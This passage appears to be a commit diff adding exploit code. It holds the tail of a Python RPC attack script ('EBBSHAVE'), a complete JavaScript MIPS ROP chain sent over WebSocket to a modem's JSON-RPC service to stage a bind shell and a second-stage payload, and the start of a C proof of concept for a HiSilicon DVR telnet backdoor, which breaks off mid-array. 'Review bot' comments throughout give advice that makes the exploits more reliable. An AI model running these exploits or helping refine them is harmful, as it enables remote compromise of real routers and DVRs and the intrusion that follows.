print '[ ] ' + ( 'Attacking' if attack else 'Pinging' ) + ' ' + serv_str
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, port))
resp_len = 0
s.send(getPacket(getMessage(
prog_num,
ver_num,
0, # NULL, acts like a ping
attack
)))
s.settimeout(5) # give inetd/... a chance to spin up the service if needed
try:
resp_len = len( s.recv(1024) ) # try to receive up to 1024 bytes
except:
resp_len = 0 # typically either timeout, connection error, or Ctrl+C
try:
s.close() # try closing the connection if it isn't already dead
except:
pass # connection is probably already dead
print '[ ] Got response length ' + str(resp_len)
if resp_len == 0: # suspect the service either timed out or crashed
if attack:
print '[+] Probably vulnerable to EBBSHAVE, hopefully you have a shell'
else:
print '[-] Service probably down or otherwise misbehaving, skipping...'
break
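Review bot: the portmapper DUMP parsing assumes every `s.recv(n)` returns exactly n bytes, which TCP does not guarantee: `s.recv(0x1c)` to skip the reply header, `unpack('>I', s.recv(4))` for the value-follows flag and `unpack('>IIII', s.recv(16))` for each mapping will all raise `struct.error` (or silently desynchronise the parse) on a short read, and a DUMP reply split across several RPC record fragments is not handled at all, since only the first fragment header is skipped and its length is never read. Wrap these reads in a small helper that loops until the requested byte count has arrived, and use each fragment header's length field rather than assuming a single fragment. Separately, the bare `except:` around `s.recv(1024)` also swallows `KeyboardInterrupt` (the comment even anticipates Ctrl+C), so the operator cannot abort a run against a long service list; catch `socket.error` and `socket.timeout` explicitly and let Ctrl+C propagate.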


@ -0,0 +1,431 @@
// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47936.zip
function buf2hex(buffer) { // buffer is an ArrayBuffer
return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join('');
}
function insertAt(arr, index, toInsert) {
for(let i = 0; i < toInsert.length; i++) {
arr[i+index]= toInsert[i];
}
}
function testEqual(buf1, buf2)
{
if (buf1.byteLength != buf2.byteLength) return false;
var dv1 = new Int8Array(buf1);
var dv2 = new Int8Array(buf2);
for (var i = 0 ; i != buf1.byteLength ; i++)
{
if (dv1[i] != dv2[i]) return false;
}
return true;
}
arr = new Uint8Array(0xd00);
arr.fill(0x41)
firstSp = 0x00
previousSp = firstSp
sp = previousSp+0xa0
insertAt(arr, previousSp+0x84-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
insertAt(arr, previousSp+0x94-1, [0xf2, 0x80, 0x80, 0xa8, 0x64])
// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
previousSp = sp
sp = previousSp+0x20
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54])
//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x14, 0x27, 0x10])
//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x8a, 0x89, 0x7c])
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call Socket
//0x80a05b20
socketAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddr) //set s0 = socketAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
//0x80a05a30;
serverAddr = [0xe2, 0x80, 0xa0, 0x5a, 0x30];
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp + 0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x48, 0x71, 0x6c])
//0x8048716c: move $a0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x87, 0x9e, 0x68])
//0x80879e68: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp-1, [0xe2, 0x80, 0x83, 0xd9, 0xb8])
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])
//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])
//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call memset
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp, [0x41, 0x2, 0x5, 0x39]) //set s0 = port
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
// previousSp = sp
// sp = previousSp+0x10
// insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, sp-1, socketAddr)
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
//store port
// previousSp = sp
// sp = previousSp+0x20
// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;
socketAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x1c]
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp+0x4-1, serverAddr) //set s1 = server
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])
//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp-1, [0xe2, 0x80, 0x8a, 0x62, 0x4c])
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])
//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])
//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call bind
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54])
//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x91, 0x20]) //set s0 = listen - 0x
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call listen
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x8, 0x40, 0x8])
//0x80084008: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xe2, 0x80, 0x8a, 0xd8, 0x84]) //set s0 = accept
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x14, 0x27, 0x10])
//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call accept
//0x80a05b24
clientAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x24]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, clientAddr) //set s0 = clientAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
// previousSp = sp
// sp = previousSp+0x20
// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;
clientAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, clientAddrM4) //set s0 = clientAddr - 4
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x4c, 0x10, 0x38])
//0x804c1038: addiu $a2, $zero, 0x400; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//0x80a05c30
payloadAddr = [0xe2, 0x80, 0xa0, 0x5c, 0x30]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp+0x4-1, payloadAddr) //set s1 = payload
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])
//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x46, 0x73, 0x68])
//0x80467368: move $a3, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x93, 0x3c]) //set s0 = recv - 0x
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call recv
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xf2, 0x80, 0x80, 0xa8, 0x64])
// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
previousSp = sp
sp = previousSp+0x20
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x12, 0x3b, 0x7c])
//0x80123b7c: addiu $a0, $a0, 4; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0xab, 0x5c]) //set s0 = sleep
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call sleep
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, payloadAddr) //set s0 = payload
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
var string = new TextDecoder("utf-8").decode(arr);
var newArr = new TextEncoder("utf-8").encode(string);
console.log(buf2hex(newArr));
exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + string + ',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}'
console.log(exploit)
console.log(testEqual(arr, newArr));
var socket = new WebSocket("ws://spectrum:spectrum@192.168.100.1:6080/Frontend", 'rpc-frontend')
socket.onopen = function(e) {
socket.send(exploit)
fetch('/payload')
};
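Review bot: the UTF-8 round-trip check `console.log(testEqual(arr, newArr))` is only logged, never acted on, yet the chain's integrity depends on it: every gadget address is placed one byte early behind a lead byte (`0xc2`, `0xe2` or `0xf2`, chosen by how many continuation bytes follow) so that the `TextDecoder`/`TextEncoder` pass preserves the high bytes, and if any insert breaks that alignment the encoder substitutes U+FFFD and `socket.send(exploit)` ships a corrupted stack. Gate the `WebSocket` send on `testEqual` returning true and report the first differing offset otherwise. Two gadget comments are also cut off (`//set s0 = listen - 0x` and `//set s0 = recv - 0x`); the `addiu $v0, $v0, 0x4d90` gadget that follows each of them is what the missing offset refers to, so the comments should state it. Finally, unlike the other files in this commit, this one has no header block (title, author, affected device and firmware, date), and nothing documents that the chain binds, listens and accepts on the port encoded in the `[0x41, 0x2, 0x5, 0x39]` sockaddr word, receives the second stage into `payloadAddr` and then jumps to it, with `fetch('/payload')` being the trigger for whatever delivers that stage; a short header comment describing this two-stage flow would save the next reader a walk through the whole ROP listing.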


@ -0,0 +1,458 @@
# Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account
# Dork: N/A
# Date: 2020-02-03
# Exploit Author: Snawoot
# Vendor Homepage: http://www.hisilicon.com
# Product Link: http://www.hisilicon.com/en/Products
# Version: hi3520d
# Tested on: Linux
# CVE: N/A
# References: https://habr.com/en/post/486856/
# References: https://github.com/Snawoot/hisilicon-dvr-telnet
# References: https://github.com/tothi/pwn-hisilicon-dvr#summary
# POC:
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
typedef unsigned char byte;
typedef unsigned int uint;
byte state[2048] = {0};
byte datum[] = {
0x20, 0x01, 0x02, 0x03, 0x04, 0x05, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09,
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11,
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19,
0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x01,
0x0e, 0x04, 0x0d, 0x01, 0x02, 0x0f, 0x0b, 0x08, 0x03, 0x0a, 0x06, 0x0c,
0x05, 0x09, 0x00, 0x07, 0x00, 0x0f, 0x07, 0x04, 0x0e, 0x02, 0x0d, 0x01,
0x0a, 0x06, 0x0c, 0x0b, 0x09, 0x05, 0x03, 0x08, 0x04, 0x01, 0x0e, 0x08,
0x0d, 0x06, 0x02, 0x0b, 0x0f, 0x0c, 0x09, 0x07, 0x03, 0x0a, 0x05, 0x00,
0x0f, 0x0c, 0x08, 0x02, 0x04, 0x09, 0x01, 0x07, 0x05, 0x0b, 0x03, 0x0e,
0x0a, 0x00, 0x06, 0x0d, 0x0f, 0x01, 0x08, 0x0e, 0x06, 0x0b, 0x03, 0x04,
0x09, 0x07, 0x02, 0x0d, 0x0c, 0x00, 0x05, 0x0a, 0x03, 0x0d, 0x04, 0x07,
0x0f, 0x02, 0x08, 0x0e, 0x0c, 0x00, 0x01, 0x0a, 0x06, 0x09, 0x0b, 0x05,
0x00, 0x0e, 0x07, 0x0b, 0x0a, 0x04, 0x0d, 0x01, 0x05, 0x08, 0x0c, 0x06,
0x09, 0x03, 0x02, 0x0f, 0x0d, 0x08, 0x0a, 0x01, 0x03, 0x0f, 0x04, 0x02,
0x0b, 0x06, 0x07, 0x0c, 0x00, 0x05, 0x0e, 0x09, 0x0a, 0x00, 0x09, 0x0e,
0x06, 0x03, 0x0f, 0x05, 0x01, 0x0d, 0x0c, 0x07, 0x0b, 0x04, 0x02, 0x08,
0x0d, 0x07, 0x00, 0x09, 0x03, 0x04, 0x06, 0x0a, 0x02, 0x08, 0x05, 0x0e,
0x0c, 0x0b, 0x0f, 0x01, 0x0d, 0x06, 0x04, 0x09, 0x08, 0x0f, 0x03, 0x00,
0x0b, 0x01, 0x02, 0x0c, 0x05, 0x0a, 0x0e, 0x07, 0x01, 0x0a, 0x0d, 0x00,
0x06, 0x09, 0x08, 0x07, 0x04, 0x0f, 0x0e, 0x03, 0x0b, 0x05, 0x02, 0x0c,
0x07, 0x0d, 0x0e, 0x03, 0x00, 0x06, 0x09, 0x0a, 0x01, 0x02, 0x08, 0x05,
0x0b, 0x0c, 0x04, 0x0f, 0x0d, 0x08, 0x0b, 0x05, 0x06, 0x0f, 0x00, 0x03,
0x04, 0x07, 0x02, 0x0c, 0x01, 0x0a, 0x0e, 0x09, 0x0a, 0x06, 0x09, 0x00,
0x0c, 0x0b, 0x07, 0x0d, 0x0f, 0x01, 0x03, 0x0e, 0x05, 0x02, 0x08, 0x04,
0x03, 0x0f, 0x00, 0x06, 0x0a, 0x01, 0x0d, 0x08, 0x09, 0x04, 0x05, 0x0b,
0x0c, 0x07, 0x02, 0x0e, 0x02, 0x0c, 0x04, 0x01, 0x07, 0x0a, 0x0b, 0x06,
0x08, 0x05, 0x03, 0x0f, 0x0d, 0x00, 0x0e, 0x09, 0x0e, 0x0b, 0x02, 0x0c,
0x04, 0x07, 0x0d, 0x01, 0x05, 0x00, 0x0f, 0x0a, 0x03, 0x09, 0x08, 0x06,
0x04, 0x02, 0x01, 0x0b, 0x0a, 0x0d, 0x07, 0x08, 0x0f, 0x09, 0x0c, 0x05,
0x06, 0x03, 0x00, 0x0e, 0x0b, 0x08, 0x0c, 0x07, 0x01, 0x0e, 0x02, 0x0d,
0x06, 0x0f, 0x00, 0x09, 0x0a, 0x04, 0x05, 0x03, 0x0c, 0x01, 0x0a, 0x0f,
0x09, 0x02, 0x06, 0x08, 0x00, 0x0d, 0x03, 0x04, 0x0e, 0x07, 0x05, 0x0b,
0x0a, 0x0f, 0x04, 0x02, 0x07, 0x0c, 0x09, 0x05, 0x06, 0x01, 0x0d, 0x0e,
0x00, 0x0b, 0x03, 0x08, 0x09, 0x0e, 0x0f, 0x05, 0x02, 0x08, 0x0c, 0x03,
0x07, 0x00, 0x04, 0x0a, 0x01, 0x0d, 0x0b, 0x06, 0x04, 0x03, 0x02, 0x0c,
